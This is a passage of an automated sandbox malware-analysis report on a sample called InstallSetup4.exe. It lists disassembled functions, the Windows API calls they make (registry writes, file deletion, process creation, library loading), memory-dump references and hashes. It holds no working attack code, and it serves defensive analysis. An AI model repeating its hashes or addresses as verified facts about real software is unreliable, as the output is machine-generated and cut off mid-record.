                                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 00401652
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401645
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 1892508949-3067928993
                                                                                            • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                            • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                            • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                            • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                                                            Function 0040248F Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 592 40248f-4024c0 call 402dab * 2 call 402e3b 599 4024c6-4024d0 592->599 600 402c2f-402c3e 592->600 601 4024d2-4024df call 402dab lstrlenW 599->601 602 4024e3-4024e6 599->602 601->602 605 4024e8-4024f9 call 402d89 602->605 606 4024fa-4024fd 602->606 605->606 610 40250e-402522 RegSetValueExW 606->610 611 4024ff-402509 call 4032b9 606->611 614 402524 610->614 615 402527-402608 RegCloseKey 610->615 611->610 614->615 615->600 617 402933-40293a 615->617 617->600
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0040B5F0,00000023,00000011,00000002), ref: 004024DA
                                                                                            • RegSetValueExW.KERNEL32(?,?,?,?,0040B5F0,00000000,00000011,00000002), ref: 0040251A
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValuelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2655323295-0
                                                                                            • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                            • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                                                            • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                            • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                                                            Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 618 4025a3-4025bf call 402deb call 402d89 623 402933-40293a 618->623 624 4025c5-4025d0 618->624 627 402c2f-402c3e 623->627 625 4025d2-4025dc RegEnumKeyW 624->625 626 4025de-4025f1 RegEnumValueW 624->626 628 4025fa-402608 RegCloseKey 625->628 626->628 629 4025f3 626->629 628->623 628->627 629->628
                                                                                            APIs
                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 397863658-0
                                                                                            • Opcode ID: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
                                                                                            • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                                                                            • Opcode Fuzzy Hash: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
                                                                                            • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                                                                            Function 00405C1B Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 634 405c1b-405c2c call 406022 637 405c5c 634->637 638 405c2e-405c34 634->638 639 405c5e-405c60 637->639 640 405c36-405c3c RemoveDirectoryW 638->640 641 405c3e DeleteFileW 638->641 642 405c44-405c46 640->642 641->642 643 405c48-405c4b 642->643 644 405c4d-405c52 642->644 643->639 644->637 645 405c54-405c56 SetFileAttributesW 644->645 645->637
                                                                                            APIs
                                                                                              • Part of subcall function 00406022: GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                              • Part of subcall function 00406022: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C36
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C3E
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                            • String ID:
                                                                                            • API String ID: 1655745494-0
                                                                                            • Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                                                                            • Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
                                                                                            • Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                                                                            • Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E
                                                                                            Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3356406503-0
                                                                                            • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                                                            • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                                                                            • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                                                            • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                            • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                            • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                            • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                            Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
                                                                                            • GetLastError.KERNEL32 ref: 00405AFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                                                            • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                                                            Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                            • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3712363035-0
                                                                                            • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                            • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                            • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                            • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                            Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                              • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                              • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                              • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                                                            • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                            • Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                                                            • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                            Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 0040604B
                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                            Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                            • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                            • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                            Function 00403B4F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\, xrefs: 00403B6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\
                                                                                            • API String ID: 2962429428-3481843031
                                                                                            • Opcode ID: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
                                                                                            • Instruction ID: 69482a2579ef2b85c2ad9764c5c762c9eb4f19b2fcf4b87e51b14fafea8afdc0
                                                                                            • Opcode Fuzzy Hash: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
                                                                                            • Instruction Fuzzy Hash: EDC0123090470496F1206F79AE8FA153A64574073DBA48726B0B8B10F3CB7C5659555D
                                                                                            Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                            • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                            • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                            Function 004063F2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                                                                            Memory Dump Source
